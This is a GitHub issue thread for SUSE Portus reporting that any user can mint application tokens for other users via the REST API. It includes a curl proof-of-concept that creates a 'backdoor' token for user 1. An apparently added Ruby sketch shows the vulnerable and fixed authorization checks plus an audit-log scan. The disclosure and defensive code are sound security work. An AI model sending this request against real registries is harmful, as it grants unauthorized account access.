SUSE / Portus

Authorization service and frontend for Docker registry (v2)
http://port.us.org/
Apache License 2.0

Users can create application tokens for any user via the REST API #2319

Open claudiocabral opened 3 years ago

claudiocabral commented 3 years ago

Description

It seems to me that any user can add application tokens to other users via the REST API.

Steps to reproduce

  1. Create a new user (can be a bot) without admin privileges, teams or namespaces
  2. Do a post request to create a new token for an arbitrary user
    curl -X POST --header 'Accept: application/json' --header 'Content-Type: application/json' --header 'Portus-Auth: sneakyuser:app_token' --data '{"application":"backdoor"}'  'https://portus.mydomain.com/api/v1/users/1/application_tokens'
  3. Get an application token for user 1
    {"id":10,"application":"backdoor","plain_token":"a_valid_portus_token"} 

Portus version: opensuse/portus:2.4
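The report above describes a missing object-level authorization check: the endpoint verifies that the caller is authenticated but not that the caller is allowed to act on the user named in the URL. The plain-Ruby sketch below is an added example, not Portus's own code; the `User`, `TokenStore`, `create_application_token*` and `cross_user_token_events` names and the audit-log line format are all hypothetical. It places the unchecked shape beside the hardened one (caller must be the target user or an admin), stores only a digest of each issued token, and includes a small audit-log scan that flags token creations where the acting user differs from the target user.

```ruby
# Added example (not Portus code): minimal model of
# POST /api/v1/users/:id/application_tokens with and without an
# object-level authorization check. All names are hypothetical.
require 'securerandom'
require 'digest'

User = Struct.new(:id, :username, :admin)

class AuthorizationError < StandardError; end

# Keeps only a SHA-256 digest of each token; the plain token is
# returned once at creation time and never persisted.
class TokenStore
  attr_reader :records

  def initialize
    @records = []
    @next_id = 1
  end

  def add(user_id, application, plain_token)
    record = { id: @next_id, user_id: user_id, application: application,
               token_digest: Digest::SHA256.hexdigest(plain_token) }
    @next_id += 1
    @records << record
    record
  end

  def tokens_for(user_id)
    @records.select { |r| r[:user_id] == user_id }
  end
end

def issue_token(store, target_user_id, application)
  plain = SecureRandom.hex(20) # 40 hex characters
  record = store.add(target_user_id, application, plain)
  { id: record[:id], application: application, plain_token: plain }
end

# Vulnerable shape: authentication only. Any logged-in user can mint a
# token for any :id in the URL, which is the behaviour the issue reports.
def create_application_token_unchecked(store, current_user, target_user_id, application)
  raise AuthorizationError, 'authentication required' if current_user.nil?
  issue_token(store, target_user_id, application)
end

# Hardened shape: the caller must be the target user or an administrator.
def create_application_token(store, current_user, target_user_id, application)
  raise AuthorizationError, 'authentication required' if current_user.nil?
  unless current_user.admin || current_user.id == target_user_id
    raise AuthorizationError,
          "user #{current_user.id} may not create tokens for user #{target_user_id}"
  end
  issue_token(store, target_user_id, application)
end

# Detection helper: given audit lines in a constructed format
# "actor=<id> target=<id> action=create_application_token", return the
# events where someone created a token for a user other than themselves.
def cross_user_token_events(audit_lines)
  audit_lines.each_with_object([]) do |line, out|
    m = line.match(/actor=(\d+) target=(\d+) action=create_application_token/)
    next unless m
    actor = m[1].to_i
    target = m[2].to_i
    out << { actor: actor, target: target, line: line } if actor != target
  end
end

if $PROGRAM_NAME == __FILE__
  store = TokenStore.new
  sneaky = User.new(7, 'sneakyuser', false) # constructed sample user
  begin
    create_application_token(store, sneaky, 1, 'backdoor')
  rescue AuthorizationError => e
    puts "denied: #{e.message}"
  end
  puts create_application_token(store, sneaky, 7, 'ci').inspect
end
```

The check belongs in the controller or policy layer for every route that carries a user id, not only this one; the audit scan is the kind of query to run over existing logs once the fix is deployed, since tokens created before the fix remain valid until rotated.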

stale[bot] commented 3 years ago

Thanks for all your contributions! This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs.

prionkor commented 3 years ago

This is a serious security issue. Any update on this?

s00500 commented 2 years ago

?